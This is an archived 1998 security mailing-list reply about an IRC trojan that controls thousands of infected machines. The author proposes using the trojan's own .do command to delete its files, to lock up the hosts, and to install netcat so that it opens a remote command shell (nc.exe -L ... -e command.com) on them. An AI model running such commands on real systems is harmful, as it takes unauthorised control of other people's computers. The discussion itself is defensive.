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Re: Internet Wide DOS Attack using IRC

daemon@ATHENA.MIT.EDU (George Imburgia)
Sat Oct 3 14:08:29 1998

Date: 	Sat, 3 Oct 1998 08:30:08 -0400
Reply-To: George Imburgia <gti@HOPI.DTCC.EDU>
From: George Imburgia <gti@HOPI.DTCC.EDU>
In-Reply-To:  <004901bdee68$73f530a0$48fc60cf@cortex>

On Fri, 2 Oct 1998, Samuel Cossette wrote:

> When a clone (Havoc call an infected computer a "Drone") is connected on irc
> anybody can control this with Private msg command (.join #chan, .part, .do
> [raw command]). 2-3 week ago the infected chan get about 500-700 drones
> (stable). My personnal estimation of infected computer it's 15000+.

With the DO command enabled, they gave us the means to remotely disable
this trojan.

Something to the effect of;

msg <nick> .do del c:\windows\system\oce*.*

Then, msg <nick> .do <some evil command to lock up the machine, forcing a

I'd be happy to write something cleaner and more specific, if someone
could forward me a copy of this trojan, or at least a directory listing of
the c:\windows\system directory on an infected machine.

The mIRC DO command is very powerful, and can be used to install netcat on
the remote machine. We could then .msg <nick> <path to netcat>\nc.exe -L
-p <any port> <your ip> -t -e command.com, giving a remote command prompt
to investigate/disinfect the machine.

Anyone with a copy of this, feel free to mail me here, or contact
Phatass on EFnet.

George Imburgia                                      e-mail: gti@hopi.dtcc.edu
Systems Administrator                                Phone:  (302)739-4068
Delaware Technical & Community College               Fax:    (302)739-3345
Office of the President                              Pager:  (302)741-5962

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